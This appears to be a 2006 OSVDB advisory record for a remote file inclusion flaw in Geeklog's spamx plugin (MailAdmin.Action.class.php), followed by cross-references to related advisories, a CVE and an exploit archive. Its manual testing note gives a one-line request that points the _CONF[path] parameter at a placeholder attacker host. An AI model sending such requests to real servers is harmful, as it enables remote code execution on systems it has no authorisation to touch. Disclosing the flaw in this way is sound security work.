Geeklog spamx/MailAdmin.Action.class.php _CONF[path] Variable Remote File Inclusion

2006-06-29T00:00:00
ID OSVDB:35805
Type osvdb
Reporter OSVDB
Modified 2006-06-29T00:00:00

Description

Manual Testing Notes

http://[target]/[path]/plugins/spamx/MailAdmin.Action.class.php?_CONF[path]=[attacker]

References:

Related OSVDB ID: 35798 Related OSVDB ID: 35804 Related OSVDB ID: 35809 Related OSVDB ID: 35801 Related OSVDB ID: 35802 Related OSVDB ID: 35803 Related OSVDB ID: 35808 Related OSVDB ID: 35810 Related OSVDB ID: 35811 Related OSVDB ID: 35812 Related OSVDB ID: 35806 Related OSVDB ID: 35807 Related OSVDB ID: 35799 Related OSVDB ID: 35800 ISS X-Force ID: 27469 Generic Exploit URL: http://milw0rm.com/exploits/1963 CVE-2006-6225 Bugtraq ID: 18740